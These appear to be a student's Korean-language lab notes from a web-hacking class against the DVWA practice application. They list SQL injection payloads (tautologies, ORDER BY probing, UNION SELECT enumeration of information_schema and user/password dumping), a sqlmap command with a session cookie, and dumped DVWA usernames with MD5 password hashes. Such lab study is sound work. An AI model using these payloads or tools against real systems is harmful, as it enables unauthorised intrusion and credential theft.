250124

SQL인젝션
select from
select * from users;
select idx,id_param from users;
select id_param from users where id_param='admin'
select id_param from users where id_param='1' or '1'='1'
admin > 1' or '1'='1
insert into
update set
delete from

1' or '1'='1
1' ORDER BY 1#
1' ORDER BY 2#
1' ORDER BY 3#(X)

1' UNION SELECT 1,2#
1' UNION SELECT 1,2,3# (X)

' UNION SELECT schema_name,2 from information_schema.schemata#
' UNION SELECT table_name,2 from information_schema.tables where table_schema='dvwa'#
' UNION SELECT column_name,2 from information_schema.columns where table_schema='dvwa' and table_name='users'#
' UNION SELECT user,password from users#

웹 공격 SQL
request
response

업로드 공격

sqlmap -u "http://192.168.56.102/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=uebmf0gupdsoltt5ts7e7hopg3"

admin
5f4dcc3b5aa765d61d8327deb882cf99

gordonb
e99a18c428cb38d5f260853678922e03

1337
8d3533d75ae2c3966d7e0d4fcc69216b

pablo
0d107d09f5bbe40cade3de5c71e9e9b7

smithy
5f4dcc3b5aa765d61d8327deb882cf99

1' UNION SELECT name,pw from users#
md5 자동화 프로그램 만들기
SQL 자동화 프로그램 만들기
21,22,23,25,110,143,3306
80, 443
Attack.py에 업로드 자동 공격 코드 추가하기